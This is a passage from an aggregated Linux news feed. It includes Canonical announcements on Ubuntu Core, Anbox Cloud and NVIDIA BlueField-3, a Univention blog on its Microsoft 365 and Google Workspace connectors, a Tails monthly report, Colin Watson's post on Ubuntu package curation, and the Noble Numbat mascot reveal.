<p><a href="https://web.archive.org/web/20240319201849/https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/">https://web.archive.org/web/20240319201849/https://wikimedia.pt/2024/02/28/wikicon-portugal-2024/</a></p>
</li>
<li>
<p><a href="https://loco.ubuntu.com/teams/ubuntu-pt/">https://loco.ubuntu.com/teams/ubuntu-pt/</a></p>
</li>
<li>
<p><a href="https://shop.nitrokey.com/shop?aff_ref=3">https://shop.nitrokey.com/shop?aff_ref=3</a></p>
</li>
<li>
<p><a href="https://masto.pt/@pup">https://masto.pt/@pup</a></p>
</li>
<li>
<p><a href="https://youtube.com/PodcastUbuntuPortugal">https://youtube.com/PodcastUbuntuPortugal</a></p>
</li>
</ul>
<h3 id="apoios">Support</h3>
<p>You can support the podcast by using the Humble Bundle affiliate links, because when you use those links to make a purchase, part of the amount you pay goes to Podcast Ubuntu Portugal.
And you can get all of this for 15 dollars, or different parts depending on whether you pay 1 or 8.
We think this is worth well over 15 dollars, so if you can, pay a little more, since you have the option of paying as much as you want.
If you are interested in other bundles not listed in the notes, use the link <a href="https://www.humblebundle.com/?partner=PUP">https://www.humblebundle.com/?partner=PUP</a> and you will also be supporting us.</p>
<h3 id="atribuição-e-licenças">Attribution and licences</h3>
<p>This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by <a href="https://senhorpodcast.pt/">Senhor Podcast</a>.
The website is produced by Tiago Carrondo and the <a href="https://gitlab.com/podcastubuntuportugal/website">open source code</a> is licensed under the terms of the <a href="https://gitlab.com/podcastubuntuportugal/website/main/LICENSE">MIT License</a>.
The theme music is: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, by Alpha Hydrae, and is licensed under the terms of the <a href="https://creativecommons.org/publicdomain/zero/1.0/">CC0 1.0 Universal License</a>.
This episode and the image used are licensed under the terms of the licence <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/">Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)</a>, <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode">the full text of which can be read here</a>. We are open to licensing that permits other types of use; <a href="https://podcastubuntuportugal.org/contactos">contact us</a> for validation and authorisation.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical’s Ubuntu Core receives Microsoft Azure IoT Edge Tier 1 supported platform statushttps://ubuntu.com//blog/canonicals-ubuntu-core-receives-microsoft-azure-iot-edge-tier-1-supported-platform-status2024-03-20T09:24:48+00:00<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="289" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_512,h_289/https://ubuntu.com/wp-content/uploads/3027/azure-snap-announcement-header.png" width="512" />
</noscript>
</div>
</figure>
<p><strong>London, 20 March 2024. </strong>Canonical has announced that Ubuntu Core, its operating system optimised for the Internet of Things (IoT) and edge, has received Microsoft Azure IoT Edge Tier 1 supported platform status from Microsoft. This collaboration brings computation, storage, and artificial intelligence (AI) capabilities in the cloud closer to the edge of the network. </p>
<h2 class="wp-block-heading">The power of the cloud on the edge</h2>
<p>Azure IoT Edge enables businesses to remotely and securely deploy and manage cloud-native workloads directly on their IoT devices, at scale, and with robust observability.</p>
<p>With the ability to deploy and manage containerised applications on devices, teams can process data, run machine learning models, perform analytics, and carry out other tasks right at the edge of the network. This approach helps reduce latency, conserve bandwidth, and it provides more immediate insights from data near to where it is generated. It is especially useful in scenarios where real-time decision-making is crucial, where network connectivity might be unreliable, or where data privacy and security concerns demand local data processing.</p>
<h2 class="wp-block-heading">The security of Ubuntu Core</h2>
<p>Ubuntu Core is an operating system designed specifically for the IoT and embedded devices. Its range of features make it ideal for secure, reliable, and scalable deployments. Built on the power of Snaps, Ubuntu Core provides a minimal core with support for multiple architectures and types of devices. Security is baked-in with secure boot and full disk encryption, and over-the-air (OTA) transactional updates to ensure that devices are always up to date. Coupled with Canonical’s Long Term Support, which offers up to 10 years of maintenance and security updates, Ubuntu Core provides long-term peace of mind for IoT implementations.</p>
<p>With the introduction of the Azure IoT Edge Snaps suite, the process of deploying edge workloads to the extensive array of devices and architectures supported by Ubuntu Core has become a streamlined, seamless, experience. Combined with the ability to remotely manage and configure both the processing and system components of fleets of devices directly from Azure, teams benefit from robust security and optimised performance. </p>
<blockquote class="wp-block-quote">
<p><em>“With Microsoft committing their support for Ubuntu Core with the release of the Microsoft Azure IoT Edge Snaps we see another example of the industry’s enthusiasm to adopt the operating system to fulfil all of their IoT needs. We look forward to growing this relationship further with Microsoft in the future”. – Michael Croft-White, Engineering Director.</em></p>
<p><em>“In collaboration with Canonical, we are making it simpler to reliably connect devices to Microsoft Azure IoT services. Snap support in Azure IoT Edge helps ensure consistent performance, enhanced security, and efficient updates across Linux distributions that support Snaps.” </em></p>
<cite><em>Kam VedBrat, GM, Azure IoT</em></cite></blockquote>
<h2 class="wp-block-heading">Further reading</h2>
<p>More information on Ubuntu Core can be found at <a href="https://ubuntu.com/core">ubuntu.com/core</a>. Our “<a href="https://ubuntu.com/engage/technical-intro-ubuntu-core22">Intro to Ubuntu Core 22</a>” webinar is a comprehensive resource for everything you need to know about Ubuntu Core. </p>
<p>If you are not already familiar with Microsoft’s Azure IoT Edge, more information can be found <a href="https://learn.microsoft.com/en-us/azure/iot-edge/?view=iotedge-1.4">here</a>. </p>
<p>Are you interested in running Ubuntu Core with Azure IoT on your devices and are working on a commercial project?</p>
<div class="wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex">
<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://ubuntu.com/internet-of-things#get-in-touch">Get in touch</a></div>
</div>
<h2 class="wp-block-heading"><strong>About Canonical</strong> </h2>
<p>Canonical, the publisher of Ubuntu, provides open-source security, support and services. Our portfolio covers critical systems, from the smallest devices to the largest clouds, from the kernel to containers, from databases to AI. With customers that include top tech brands, emerging startups, governments and home users, Canonical delivers trusted open source for everyone.</p>Ubuntu developershttp://planet.ubuntu.com/(Chinese) Meet deepin for a chat in the ancient capital! The deepin Meetup Xi'an stop awaits you on 30 March (Saturday)!https://www.deepin.org/?p=333942024-03-20T08:43:48+00:00Sorry, this entry is only available in Chinese.aidahttps://www.deepin.org/enUbuntu Blog: Implementing an Android™ based cloud game streaming service with Anbox Cloudhttps://ubuntu.com//blog/implementing-an-android-based-cloud-game-streaming-service-with-anbox-cloud2024-03-20T08:37:25+00:00<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" height="820" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1439,h_820/https://ubuntu.com/wp-content/uploads/6ca1/Screen-Shot-2020-01-20-at-15.39.57.png" width="1439" />
</noscript>
</div>
</figure></div>
<p>Since the outset, <a href="http://www.anbox-cloud.io">Anbox Cloud</a> was developed with a variety of use cases for running Android at scale. Cloud gaming, more specifically for casual games as found on most users’ mobile devices, is the most prominent one and growing in popularity. Enterprises are challenged to find a solution that can keep up with the increasing user demand, provide a rich experience and keep costs affordable while shortening the time to market.</p>
<p>Anbox Cloud brings Android from mobile devices to the cloud. This enables service providers to deliver a large and existing ecosystem of games to more users, regardless of their device or operating system. Existing games can be moved to Anbox Cloud with zero to minimal effort.</p>
<p>Canonical has built Anbox Cloud upon existing technologies that allow for a higher container density compared to traditional approaches, which helps to reduce the overall cost of building and operating a game streaming service. The cost structure of a casual game, based in the cloud, also shows that density is key for profitability margins. To achieve density optimisation, three factors must be considered: container density (CPU load, memory capacity and GPU capacity), profitability and user experience optimisation. Additional considerations include choosing the right hardware to match the target workload, intended rendering performance and the pricing sensitivity of gamers. Finding the optimal combination for these factors and adding a layer of automation is crucial to improve profitability margins and to meet SLAs.</p>
<p>To further address specific challenges in cloud gaming, Canonical collaborates with key silicon and cloud partners to build optimised hardware and cloud instance types. Cloud gaming has a high demand on various hardware components, specifically GPUs which provide the underlying foundation for every video streaming solution. Utilising the available hardware with the highest density for cost savings requires optimisation on every layer. <a href="https://anbox-cloud.io">Anbox Cloud</a> specifically helps to get the maximum out of the available hardware capacity. It keeps track of resources spent by all launched containers and optimises placement of new containers based on available capacity and resource requirements of specific containers.</p>
<p>Next to finding the right software and hardware platform, cloud gaming mandates positioning the actual workload as close to the user as possible to reduce latency and ensure a consistent experience. To scale across different geographical regions, <a href="https://anbox-cloud.io">Anbox Cloud</a> provides operational tooling and software components to simplify the deployment without manual overhead and ensures users get automatically routed to their nearest location. Plugging individual regions dynamically into a control plane allows new regions to be easily added on the go without any downtime or manual intervention.</p>
<p><a href="https://anbox-cloud.io">Anbox Cloud</a> builds a high-density and easy-to-manage containerisation platform on top of the <a href="https://linuxcontainers.org/#LXD">LXD</a> container hypervisor which helps to minimise the time to market and reduce overall costs. It reflects Canonical’s deep expertise in cloud-native applications and minimises operational overhead in multiple ways. With the use of existing technologies from Canonical like <a href="https://jaas.ai/">Juju</a> or <a href="https://maas.io/">MAAS</a>, it provides a solid and proven platform which is easy to deploy and maintain. Combined with the <a href="https://ubuntu.com/pro">Ubuntu Pro</a> support program from Canonical, an enterprise can ensure it gets long-term help whenever needed.</p>
<p>As differentiation is key in building a successful cloud gaming platform, <a href="https://anbox-cloud.io">Anbox Cloud</a> provides a solid foundation which is extensible and fits into many different use cases. For example, integrating a custom streaming protocol is possible by writing a plug-in and integrating it via provided customising hooks into the containers which power <a href="https://anbox-cloud.io">Anbox Cloud</a>. To make this process easy, Canonical provides an SDK, rich documentation with example plugins and engineering services to help with any development around <a href="https://anbox-cloud.io">Anbox Cloud</a>.</p>
<p>In summary, <a href="https://anbox-cloud.io">Anbox Cloud</a> provides a feature rich, generic and solid foundation to build a state of the art cloud gaming service which provides optimal utilisation of the underlying hardware to deliver the best user experience while keeping operational costs low.</p>
<p>If you’re interested to learn more, please come and <a href="https://anbox-cloud.io/contact-us">talk to us</a>.</p>
<p class="has-small-font-size">Android is a trademark of Google LLC. Anbox Cloud uses assets available through the Android Open Source Project.<br /><br /></p>Ubuntu developershttp://planet.ubuntu.com/Univention App Highlights: Enhancing Office Solutions Through Advanced IAM Integrationhttps://www.univention.de/?p=686262024-03-20T07:35:26+00:00<section class="wpb-content-wrapper"><div class="univention-row default univention-row--padding-45 color-scheme-default"><div class="univention-container"><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
<div class="wpb_text_column wpb_content_element ">
<div class="wpb_wrapper">
<p>Welcome back to our journey into the world of Univention apps! In this blog series, we regularly present exciting applications from our <a href="https://www.univention.com/products/app-catalog/">App Center</a>. In our second episode, we’re diving into IAM integration with two key connectors: the Microsoft 365 Connector and the Google Workspace Connector. These apps build bridges and facilitate exchange between your UCS environment and these essential cloud office solutions.<span id="more-68626"></span></p>
<h2>Office in a Browser: Balancing Necessity with Compromise</h2>
<p>Microsoft 365 and Google Workspace have become the go-to platforms for businesses of all sizes. These cloud-based office solutions are notably practical, offering easy browser access from various devices, an extensive array of collaboration tools, and scalable options—a key benefit for expanding companies. Despite their convenience and ability to cover essential business requirements, these cloud services are not without their flaws, often considered a “necessary evil”.</p>
<p>The platforms bind companies to their respective ecosystems, creating dependencies. This connection to a single provider limits choices and raises significant concerns regarding security and data protection, issues that often trouble decision-makers and users alike. Neither Microsoft 365 nor Google Workspace is immune to security vulnerabilities, and the centralized cloud storage of sensitive corporate data continuously presents a risk.</p>
<p>For those who can’t or prefer not to eliminate cloud services from their operations, finding a way to mitigate security risks without compromising efficiency and functionality is crucial. This is where effective Identity and Access Management (IAM) comes into play. Univention Corporate Server offers a range of robust and powerful IAM functions along with corresponding connectors that make it easy and secure for users to access the cloud office—introducing our two apps: the <a href="https://www.univention.com/products/app-catalog/microsoft365/">Microsoft 365 Connector</a> and the <a href="https://www.univention.com/products/app-catalog/google-apps/">Google Workspace Connector</a>.</p>
<h2>Microsoft 365 Connector</h2>
<p>This app serves as a vital link between your UCS domain and the Microsoft 365 platform. It efficiently synchronizes user accounts and groups from the UCS directory service to Microsoft Entra ID, previously known as Azure Active Directory, Microsoft’s identity and access management service. Our connector ensures a smooth transition for all users, enabling them to log into MS 365 using their UCS credentials through Single Sign-on (SSO). It’s an optimal solution for companies and organizations that leverage Univention Corporate Server for IAM while also wanting to tap into the capabilities of the Microsoft cloud.</p>
<p><strong>Here is an overview of the features:</strong></p>
<ul>
<li><strong>Synchronization:</strong> This feature enables administrators to seamlessly add, update, or remove selected UCS users from the Microsoft 365 Azure account; simplified user management as little to no manual intervention is required; the user base is always up-to-date in both systems</li>
<li><strong>Single Sign-on (SSO):</strong> The SSO capability provides straightforward access to the cloud platform. Users can log in using their UCS credentials, granting direct access to all MS 365 functionalities. Importantly, the user’s password always remains within the UCS domain.</li>
</ul>
<h3>Setting up the Microsoft 365 Connector</h3>
<p>Before you begin installing the app from our App Center, there are a few essential steps to complete. Firstly, you’ll need a Microsoft 365 administrator account and an account with Microsoft Entra (formerly Azure Active Directory). If you don’t already have these, they can be provided by the manufacturer free of charge for testing purposes. In addition, a domain verified by Microsoft is required to ensure your organization operates under a secure and recognized domain. Lastly, you will need a Microsoft 365 business subscription, which is also available as a free trial. Please note that connecting with a private Microsoft account is not an option.</p>
<p>Our manual describes the exact steps for configuration in the <a href="https://docs.software-univention.de/manual/5.0/en/idm-cloud/office-365.html">Microsoft 365 Connector chapter</a>. Once you’re ready, proceed with installing the app. A user-friendly setup wizard is provided to guide you through all the necessary steps to get you up and running.</p>
<p><a href="https://www.univention.de/wp-content/uploads/2024/03/microsoft-365-en.png"><img alt="microsoft 365 connector" class="alignnone wp-image-68628 size-full" height="1006" src="https://www.univention.de/wp-content/uploads/2024/03/microsoft-365-en.png" width="1919" /></a></p>
<p>All other adjustments are made through the Users module of the Univention Management Console (UMC). Within this module, you’ll notice a new tab labeled <em>Microsoft 365</em> for each user profile. It’s important to remember that any modifications made to user data in UCS will automatically be replicated in Microsoft Entra ID. However, the process isn’t bidirectional; changes made directly in MS Entra won’t sync back to UCS. If users or groups are deactivated or renamed there, they aren’t deleted but merely deactivated, enabling the reallocation of their licenses as needed.</p>
<p>Since 2021, the connector has expanded its capabilities to include support for collaboration with MS Teams. This feature allows UCS groups to be established as Teams within Microsoft 365, all managed via the UMC. During the setup process, you’ll assign a team owner who will then handle additional configurations directly in the Teams interface. Once you’ve activated a UCS group as a Team in Microsoft 365, its members are automatically added to the new team.</p>
<h2>Google Workspace Connector</h2>
<p>This app acts as a gateway to Google’s cloud services, ensuring user identities stay safely within your own IT infrastructure. This allows for complete control over user data. The connector is compatible with both the business edition of Google Workspace, ideal for companies with up to 300 users, and the education version, designed for educational institutions. Thanks to the single sign-on feature, user passwords are securely contained within the UCS domain, maintaining the security of sensitive access information in your environment.</p>
<p><strong>Key Features Include:</strong></p>
<ul>
<li><strong>Single Sign-on (SSO):</strong> Enables users to log in using their UCS credentials, providing direct access to all Google Workspace functionalities. The user password always stays secure within the UCS domain; users do not need to create and manage their own Google account.</li>
<li><strong>Central License Management:</strong> This feature allows administrators to effortlessly monitor and manage licenses and associated costs.</li>
</ul>
<h3>Setting up the Google Workspace Connector</h3>
<p>To set up the Google Workspace Connector for your UCS environment, begin by ensuring you have a Google administrator account. This account is needed to log in to the Google Admin Console, where you can manage Google services for all users in your organization. Note that a private Google account will not suffice for this purpose. Additionally, you’ll need a domain verified by Google. Fortunately, both can be obtained from the provider at no cost for testing purposes.</p>
<p>After installing the Google Workspace Connector app, a setup wizard will launch, guiding you through the initial configuration steps.</p>
<p><a href="https://www.univention.de/wp-content/uploads/2024/03/google-workspace-en.png"><img alt="google workspace connector" class="alignnone wp-image-68629 size-full" height="750" src="https://www.univention.de/wp-content/uploads/2024/03/google-workspace-en.png" width="1011" /></a></p>
<p>The remaining configuration steps for the Google Workspace Connector are conducted via the Users module in the Univention Management Console (UMC). For all user objects, there is now a new tab called <em>Google Apps</em> which allows you to designate whether an account should be provisioned to Google Workspace. Any changes made in the UCS directory service are automatically synchronized with the Google service. Similar to the Microsoft 365 Connector, this synchronization is unidirectional, meaning that modifications made in the Google domain are not automatically transferred to the UCS system. If you deactivate an account’s Google Apps feature in UCS, it will automatically be removed from the Google domain. This mechanism ensures that user information remains consistent and up-to-date across both systems.</p>
<p>For more information about the setup, please read the <a href="https://docs.software-univention.de/manual/5.0/de/idm-cloud/google.html#google-apps-for-work-connector">Google Apps for Work Connector chapter</a> in our manual.</p>
<h2>Final Thoughts: Join the Conversation in Our Community</h2>
<p>Wrapping up, we’re left with an important question: Is identity and access management like this really the best way to go? Does the ease it brings make up for being tied to certain platforms and the security worries that might come with it? For companies and organizations that can’t let go of Microsoft or Google cloud services, our connector apps are a solid and secure choice for both users and admins. And if you’re thinking of moving away from the big cloud providers, our App Center is full of collaboration and office tools under open source licenses that fit right into the UCS environment.</p>
<p>What’s been your journey with Univention Corporate Server as an IAM solution? Have you tried out any of the connectors we talked about in this article? We’d love to hear about your experiences. Share your stories with us and the community.</p>
<p>Visit the <a href="https://help.univention.com/">Forum Univention Help</a> and become a part of our community!</p>
<p style="text-align: right;">Image source: Icon created by <a href="https://www.flaticon.com/authors/freepik">Freepik</a> from flaticon.com</p>
</div>
</div>
</div></div></div></div></div></div>
</section><p>The post <a href="https://www.univention.com/blog-en/2024/03/univention-app-highlights-enhancing-office-solutions-through-advanced-iam-integration/">Univention App Highlights: Enhancing Office Solutions Through Advanced IAM Integration</a> first appeared on <a href="https://www.univention.com">Univention</a>.</p>Yvonne Rugehttps://www.univention.com/news/blog-en/BunsenLabs Mastodonhttps://www.bunsenlabs.org/feed/news/b8b2286d-8be2-5f12-8920-dbe8d8455f852024-03-20T00:00:00+00:00<div class="postmsg">
<p>
We officially took control of the BL Mastodon instance today. Please feel free to give us a follow and a boost.
</p>
<p>
@bunsenlabs@linuxrocks.online
</p>
</div>BunsenLabs Linuxhttps://forums.bunsenlabs.org/viewforum.php?id=12Tails report for February 2024https://tails.net/news/report_2024_02/2024-03-19T11:46:47+00:00<h1>Highlights</h1>
<p>Despite the bonus day this year, February flew by pretty quickly! Here's what
we were up to:</p>
<ul>
<li><p>We ended February more resilient and collaborative than when we started. We
have new tooling to make it easier to work on shared documents, and use XMPP
more effectively. We also worked to strengthen our front-end services and set
up the back-end infrastructure to build redundancies into our services.</p></li>
<li><p>In 2021 and 2022, our <a href="https://tails.net/news/improving_in_latam/index.en.html">usability tests with human rights defenders in Mexico
and Brazil</a> prompted several
improvements in the installation instructions for Tails. Of the identified
usability issues, 16 were still remaining, and we fixed them all this month.
These tests, experiences, and improvements will greatly shape our future
trainings.</p></li>
<li><p>We finished updating our website for Tails 6.0. Check out the rewritten
<a href="https://tails.net/doc/encryption_and_privacy/secure_deletion/index.en.html">recommendation on secure
deletion</a>. </p></li>
</ul>
<h1>Releases</h1>
<p>📢 <a href="https://tails.net/news/version_6.0/index.en.html">Tails 6.0 is out</a>! </p>
<p>Tails 6.0 is the first version of Tails based on Debian 12 ("bookworm"), and is
the sexiest, slickest, and sleekest Tails yet. It brings:</p>
<ul>
<li><p>several important security updates: more robust error detection for the
Persistent Storage, protections against malicious USB devices, and Diceware
word lists in Catalan, German, Italian, Portuguese, and Spanish</p></li>
<li><p>some more usability features: new light modes—dark, night, and a
combination of both; easier screenshotting and screencasting; and easier Gmail
configuration in Thunderbird</p></li>
<li><p>and updated versions of most of the applications in Tails</p></li>
</ul>
<p>To learn more, check out the Tails 6.0 <a href="https://tails.net/news/version_6.0/index.en.html">release notes</a> and
the
<a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.
Thank you to everyone who helped us out by testing the <a href="https://tails.net/news/test_6.0-rc1/">release
candidate</a>.</p>
<h1>Metrics</h1>
<p>Tails was started more than 806,714 times this month. That's a daily average of
over 27,817 boots.</p>Tailshttps://tails.net/news/index.en.htmlUbuntu Blog: Canonical collaborates with NVIDIA to simplify enterprise AI deployments with NVIDIA BlueField-3 operating an optimised, Ubuntu-based Linux OShttps://ubuntu.com//blog/ubuntu-and-nvidia-bluefield-32024-03-19T09:00:00+00:00<p>The <a href="https://www.nvidia.com/en-us/networking/products/data-processing-unit/">NVIDIA BlueField-3 networking platform</a> – powering the latest data processing units (DPUs) and SuperNICs, and transforming data centre performance and efficiency – runs BlueField OS, an optimised Linux operating system (OS) derived from Ubuntu. With Ubuntu’s signature maintenance and support guarantees, the comprehensive Ubuntu Pro software infrastructure stack, and bespoke optimisation, the collaboration between NVIDIA and Canonical accelerates time to value for NVIDIA BlueField-3 users and elevates security. </p>
<h2 class="wp-block-heading">What are DPUs? </h2>
<p>DPUs are a relatively new technology that represents the third pillar of accelerated data centre processing units, alongside CPUs and GPUs. By offloading and accelerating a wide variety of complex networking, security and storage workloads to the DPU, enterprises can <a href="https://resources.nvidia.com/en-us-accelerated-networking-resource-library/nvidia-dpu-power-efficiency-white-paper">reduce server power consumption by up to 30%</a> while freeing up CPU capacity for computation tasks.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/ET41fpdF7Vt1LyDLjxM90Y2Ca-lxWlIYojlah_H39HyPSnHdsLJ7ssYkkJ49OSge0KLnQDOImBczLPhgMwv8fwX8b5TrD6FOwezXgyCMdFtDq4ZIxGrPy0vSTp3ZKoIXsLYfv_cyMedRx6j2fCJs" width="720" />
</noscript>
</div>
</figure>
<p>NVIDIA, now shipping the third generation of its industry-leading BlueField DPU, empowers enterprises to transform data centres with a 400Gb/s infrastructure compute platform that can handle the most demanding AI workloads. </p>
<h2 class="wp-block-heading">NVIDIA BlueField OS is built on Ubuntu</h2>
<p>DPUs require an operating system that is secure, stable and capable of supporting all of the innovative features that the new technology brings to the table – and that’s why NVIDIA BlueField-3 runs an optimised derivative of Ubuntu as its default OS. </p>
<p>Ubuntu, delivered by Canonical, supports a broad range of NVIDIA BlueField-3 features, ensuring that enterprise customers can readily consume the DPU functions with optimal performance. Canonical’s collaboration with NVIDIA delivers a solution that is easy to implement and offers full functionality out of the box.</p>
<p>Alongside time to value, Ubuntu reinforces the stability of NVIDIA BlueField-3. The optimised Ubuntu derivative powering the NVIDIA BlueField OS is based on Ubuntu Long Term Support (LTS) and goes through the same rigour of validation as an LTS release, which consequently delivers the same level of stability and performance. Ubuntu Pro embedded support is a core part of NVIDIA BlueField’s OS, thus enhancing the reliability of any NVIDIA BlueField-accelerated solution. </p>
<h2 class="wp-block-heading">NVIDIA BlueField-3 Enterprise support and security backed by Canonical</h2>
<p>Ubuntu’s <a href="https://ubuntu.com/security">extensive security features</a>, hardening and compliance tooling, coupled with Canonical’s enterprise-grade support, have been instrumental in making Ubuntu the first-choice OS for organisations worldwide. NVIDIA customers can be assured that these same capabilities are also extended to NVIDIA BlueField-3 deployments.</p>
<p>One of the key factors that sets Ubuntu’s security apart from alternative operating systems is the pace at which Canonical delivers fixes for common vulnerabilities and exposures (CVEs). Canonical has the fastest turnaround for CVE fixes in the industry, and this rapid patching applies to the NVIDIA BlueField OS. What’s more, these updates can be applied automatically, further minimising any windows of vulnerability. </p>
<p>Canonical is also signing the entire kernel image for the NVIDIA BlueField OS. This enables secure boot in enterprise deployments and guarantees that no modifications are made to the kernel, so that users can have complete trust in the OS.</p>
<h2 class="wp-block-heading">Powering AI with Canonical infrastructure solutions and NVIDIA BlueField-3 </h2>
<p>NVIDIA BlueField-3 DPUs are increasingly becoming a central component in enterprise AI strategies. These use cases require a comprehensive ecosystem of software for optimal performance and efficiency. Canonical’s close collaboration with NVIDIA enables BlueField-3 users to take advantage of infrastructure solutions to address most enterprise AI data centre deployments and enable end-to-end management.</p>
<p>Customers can utilise metal-as-a-service (<a href="https://maas.io/">MAAS</a>) for cloud-style provisioning of their physical infrastructure, turning bare-metal servers into an elastic, cloud-like resource that they can easily provision, monitor and manage. Meanwhile, <a href="https://juju.is/">Juju</a> provides an orchestration engine for software operators that enables the deployment, integration, and lifecycle management of applications at any scale on infrastructure compute.</p>
<p>On the infrastructure software side, <a href="https://ubuntu.com/openstack">Canonical OpenStack</a> provides an enterprise cloud platform, and <a href="https://ubuntu.com/kubernetes">Canonical Kubernetes</a> drives seamless, highly automated container orchestration. These infrastructure services can fully utilise the offload capabilities supported in NVIDIA BlueField DPUs. In fact, Canonical also offers <a href="https://microk8s.io/">MicroK8s</a>, a lightweight Kubernetes distribution that is tailor-made for low footprint deployments on DPUs. Similarly, <a href="https://microcloud.is/">MicroCloud</a> is a miniature version of LXD, providing enterprises with everything they need to run virtualized workloads and system containers on their DPUs. All of these solutions are secured and supported for 10 years with an Ubuntu Pro subscription.</p>
<h2 class="wp-block-heading">Ubuntu Pro and NVIDIA DOCA</h2>
<p>The Ubuntu Pro stack works in tandem with <a href="https://developer.nvidia.com/networking/doca">NVIDIA DOCA</a>, software at the heart of NVIDIA BlueField-3. NVIDIA DOCA is a unified software framework that provides a variety of APIs for improved NVIDIA BlueField-3 management, unlocking features around connectivity, monitoring, logging and more. Utilised alongside Ubuntu Pro, these features drive unprecedented infrastructure efficiency.</p>
<ul>
<li>To learn more about deploying DPUs on Ubuntu, <a href="https://ubuntu.com/nvidia">get in touch</a>.</li>
<li>To learn more about NVIDIA BlueField-3, check out the <a href="https://resources.nvidia.com/en-us-accelerated-networking-resource-library/datasheet-nvidia-bluefield">datasheet</a>.</li>
<li>Further reading: <a href="https://ubuntu.com/blog/ubuntu-on-smartnics-drive-data-centre-efficiency">Canonical solutions reduce SmartNIC time-to-market and drive efficiency in enterprise data centers</a></li>
</ul>Ubuntu developershttp://planet.ubuntu.com/(Chinese) Topics announced | Join the Wuhan Linux User Group offline salon on March 23!https://www.deepin.org/?p=333862024-03-19T08:53:11+00:00Sorry, this entry is only available in Chinese.aidahttps://www.deepin.org/enColin Watson: apt install everything?tag:www.chiark.greenend.org.uk,2024-03-19:/~cjwatson/blog/ubuntu-install-everything.html2024-03-19T07:05:27+00:00<p>On Mastodon, the
<a href="https://mastodon.social/@Hacksaw/112118031428498349">question</a> came up of
how Ubuntu would deal with something like the <a href="https://boehs.org/node/npm-everything">npm install
everything</a> situation. I replied:</p>
<blockquote>
<p>Ubuntu is curated, so it probably wouldn’t get this far. If it did, then
the worst case is that it would get in the way of <span class="caps">CI</span> allowing other
packages to be removed (again from a curated system, so people are used to
removal not being self-service); but the release team would have no
hesitation in removing a package like this to fix that, and it certainly
wouldn’t cause this amount of angst.</p>
<p>If you did this in a <a href="https://help.launchpad.net/Packaging/PPA"><span class="caps">PPA</span></a>, then
I can’t think of any particular negative effects.</p>
</blockquote>
<p><span class="caps">OK</span>, if you added lots of build-dependencies (as well as run-time
dependencies) then you might be able to take out a builder. But Launchpad
builders already run arbitrary user-submitted code by design and are
therefore very carefully sandboxed and treated as ephemeral, so this is
hardly novel.</p>
<p>There’s a lot to be said for the arrangement of having a curated system for
the stuff people actually care about plus an ecosystem of add-on
repositories. PPAs cover a wide range of levels of developer activity, from
throwaway experiments to quasi-official distribution methods; there are
certainly problems that arise from it being difficult to tell the difference
between those extremes and from there being no systematic confinement, but
for this particular kind of problem they’re very nearly ideal. (Canonical
has tried various other approaches to software distribution, and while they
address some of the problems, they <a href="https://popey.com/blog/2024/03/exodus-wallet-part-three/">aren’t obviously
better</a> at helping
people make reliable social judgements about code they don’t know.)</p>
<p>For a hypothetical package with a huge number of dependencies, to even try
to upload it directly to Ubuntu you’d need to be an Ubuntu developer with
upload rights (or to go via Debian, where you’d have to clear a similar
hurdle). If you have those, then the first upload has to pass manual review
by an archive administrator. If your package passes that, then it still has
to build and get through
<a href="https://wiki.ubuntu.com/ProposedMigration">proposed-migration</a> <span class="caps">CI</span> before it
reaches anything that humans typically care about.</p>
<p>On the other hand, if you were inclined to try this sort of experiment,
you’d almost certainly try it in a <span class="caps">PPA</span>, and that would trouble nobody but yourself.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: The Coronation of a New Mascot: Noble Numbathttps://ubuntu.com//blog/the-coronation-of-a-new-mascot-noble-numbat2024-03-19T06:00:00+00:00<figure class="wp-block-image size-large is-resized">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/c5414d0e-Numbat.png" width="720" />
</noscript>
</div>
</figure>
<p>Whether it’s via a popular vote, divine providence or magical women lying in ponds distributing swords, it has often been individuals of great renown or noble birth who have ascended to the throne. On the eve of our 20th anniversary, we are thrilled to present the Noble Numbat, our mascot for Ubuntu 24.04 LTS. </p>
<h2 class="wp-block-heading">Humble beginnings </h2>
<p>The numbat, a small enigmatic marsupial from Australia, may not be the first creature that comes to mind when one ponders nobility. However, looks can be deceiving. These incredible, endangered animals are actually pocket-sized anteaters that live purely on ants, which they catch with a tongue a third the length of their body. With a back of black and white stripes much like a kingly robe, they were elected as the state animal emblem of Western Australia. The numbat is a testament that those from humble beginnings can make their mark on the world.</p>
<h2 class="wp-block-heading">A crowning achievement</h2>
<p>Ubuntu, in the same regard, has grown from a fledgling dream of a more human-friendly Linux into a trusted platform that powers millions of devices around the world. For this LTS (long term support) release we wanted to capture that essence of grandeur and the stateliness of our small Myrmecobiidae friend. </p>
<p>We are very excited to unveil and crown the official mascot wallpaper. Give your computer or phone a majestic upgrade by downloading <a href="https://drive.google.com/drive/folders/1hzlUuCOCORWyTvIWqDN_d9W4gFDqetvZ" rel="noreferrer noopener" target="_blank">these Noble Numbat Wallpapers</a> in a variety of formats and sizes. </p>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
